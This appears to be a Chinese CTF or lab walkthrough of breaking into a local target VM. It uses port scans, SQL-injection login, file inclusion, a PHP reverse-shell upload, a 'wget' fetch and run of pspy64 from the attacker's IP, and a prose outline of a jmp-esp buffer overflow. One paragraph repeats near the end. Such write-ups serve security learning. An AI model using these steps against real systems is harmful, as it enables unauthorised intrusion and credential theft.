主机探活
nmap -sP 192.168.159.0/24
目标主机IP为:192.168.159.176
端口发现
nmap -sV -p- -A 192.168.159.176
目标主机开放:22、23、80端口
80端口
目录扫描
dirsearch -u http://192.168.159.176
去主页看看,发现有一个登录窗口,尝试sql注入
成功登陆后台。。。
文件包含
但是在后台并没有找到可以上传文件的地方,不过在寻找过程中发现他好像是文件包含
每个页面的不同之处就在于 page 参数后传的内容。
我在尝试访问一些敏感文件(/etc/passwd等等)无果后,准备 fuzz 跑一下网站可能存在的文件,但是在网页源码中发现了一条注释内容,里面有一个文件:site_settings
访问后发现是个管理页面,可以上传文件
上传php反弹shell文件,发现上传后就开始一直加载了,猜测可能一上传就触发了
本地开启端口监听,成功获得shell
提权
首先就是一套 suid、sudo、计划任务 丝滑小连招,啥都没有找到
信息收集
家目录下有两个用户,可以读,但是里面啥都没有。。。
在网站目录 /etc/www/html/student_attendance 下找到了一个数据库配置文件
在获得 fox 连接数据库的密码后,尝试登录 fox 用户,失败,没有使用同一个密码
之后我也登入了数据库,没有找到什么有用的信息。。。
脚本
wget 192.168.159.131/pspy64
chmod +x pspy64
./pspy64
发现了一个奇怪可疑的文件,它在 /root 目录下,是/bin/sh运行的
刚开始我以为看不了,但试了一下发现能进 /root 文件夹。。。
查看这个文件
Wine 代表 Wine 不是一个模拟器。 它是一套接口,将对 Windows 系统调用指令翻译成对 Linux 和其他类 Unix 系统的 POSIX 系统调用指令。
它以 window 命令 在 linux 上执行了一个 exe 文件,我们看看这个程序有没什么问题
后面就要在 windows 下对该程序进行分析,这里我不熟悉,就不写了。。。
最后结果是该程序应该是使用23端口的telnet服务,并且存在缓冲区溢出漏洞,分析后获得相应的 payload,但我不会在 windows上做,就不献丑了。
思路和之前写的 缓冲区溢出 一致,只不过由于在测试机上运行的程序获得的 esp 地址肯定和靶机上的不同,所以主要任务是获取esp地址。
这里采用的方法是:寻找这个程序(以及其动态链接库)中存在的 jmp esp指令的地址,把这个地址放到eip中,即可成功跳转到esp,执行shellcode
缓冲区溢出 一致,只不过由于在测试机上运行的程序获得的 esp 地址肯定和靶机上的不同,所以主要任务是获取esp地址。
这里采用的方法是:寻找这个程序(以及其动态链接库)中存在的 jmp esp指令的地址,把这个地址放到eip中,即可成功跳转到esp,执行shellcode
具体可参考这位大佬blog:(http://vxer.cn/?id=5)